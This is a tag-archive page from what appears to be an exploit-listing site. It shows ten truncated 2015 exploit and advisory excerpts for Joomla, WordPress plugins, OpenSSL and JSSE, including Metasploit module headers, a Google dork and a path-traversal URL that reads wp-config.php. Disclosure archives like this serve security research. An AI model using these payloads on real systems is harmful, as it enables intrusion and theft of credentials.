Tags archives: unix

 


Joomla Content History SQL Injection Remote Code Execution

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, 'Name' => "Joomla Content History SQLi Remote Code Execution", 'Description' => %q{ This module exploits a SQL injection vulnerability found in Joomla versions […]

 


WordPress Ajax Load More PHP Upload

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper   def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the […]

 


WP Fastest Cache 0.8.4.8 Blind SQL Injection

# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection # Date: 11-11-2015 # Software Link: https://wordpress.org/plugins/wp-fastest-cache/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps   1. Description   For this vulnerability, WP-Polls also needs to be installed.   Everyone can access wpfc_wppolls_ajax_request().   $_POST["poll_id"] is not escaped properly. […]

 


OpenSSL Alternative Chains Certificate Forgery

#!/usr/bin/env ruby # encoding: ASCII-8BIT # By Ramon de C Valle. This work is dedicated to the public domain.   require 'openssl' require 'optparse' require 'socket'   Version = [0, 0, 1] Release = nil   class String def hexdump(stream=$stdout) 0.step(bytesize - 1, 16) do |i| stream.printf('%08x ', i)   0.upto(15) do |j| stream.printf(' ') […]

 


Java Secure Socket Extension (JSSE) SKIP-TLS

#!/usr/bin/env ruby # encoding: ASCII-8BIT # By Ramon de C Valle. This work is dedicated to the public domain.   require 'openssl' require 'optparse' require 'socket'   Version = [0, 0, 1] Release = nil   def prf(secret, label, seed) if secret.empty? s1 = s2 = '' else length = ((secret.length * 1.0) / 2).ceil […]

 


WordPress Neuvoo-Jobroll 2.0 Cross Site Scripting

###################################################################### # Exploit Title: Wordpress plugin neuvoo-jobroll 2.0 Reflected Cross-Site Scripting (RXSS) # Date: 05/11/2015 # Author: Mickael Dorigny @ Synetis # Vendor or Software Link: http://neuvoo.fr/fr # Version: 2.0 # Category: Reflected Cross Site Scripting # Google dork: # Tested on : Wordpress with neuvoo-jobroll 2.0 ######################################################################   Neuvoo description : ======================================================================   Neuvoo […]

 


WordPress Font 7.5 Path Traversal

Details ================ Software: Font Version: 7.5 Homepage: https://wordpress.org/plugins/font/ CVE: CVE-2015-7683 (Pending) CVSS: 6.3 (Medium; AV:N/AC:M/Au:S/C:C/I:N/A:N) CWE: CWE-22   Description ================ An absolute path traversal vulnerability in Font 7.5 allows WordPress admins read access to system files such as /etc/passwd. Font is a WordPress plugin with over 40,000 active installs.   Vulnerability ================ The vulnerability is […]

 


WordPress Pie Register 2.0.18 SQL Injection

Details ================ Software: Pie Register Version: 2.0.18 Homepage: https://github.com/GTSolutions/Pie-Register CVE: CVE-2015-7682 (Pending) CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N) CWE: CWE-89   Description ================ Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs.   Vulnerabilities ================ […]

 


WordPress Events Made Easy 1.5.49 CSRF / XSS

Plugin link: https://wordpress.org/plugins/events-made-easy/ Active Installs: 10,000+ Version tested: 1.5.49 CVE Reference: Waiting Original advisory: https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/   Events Made Easy is a full-featured event management solution for WordPress. Events Made Easy supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy you can […]

 


WordPress mTheme-Unus Local File Inclusion

####################################### # Exploit Title: Wordpress themes mTheme-Unus LFI Vulnerability # # Date: 2015-09-27 # Exploit Author: FullSecurity.org # Google Dork: ilnurl:/wp-content/themes/mTheme-Unus/ # Vendor Homepage: https://wordpress.org/ # Tested on : Kali Linux ######################################## Description : The Wordpress theme mTheme-Unus does not filter data, so we can get the configuration file at the path < site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>   # Exploite […]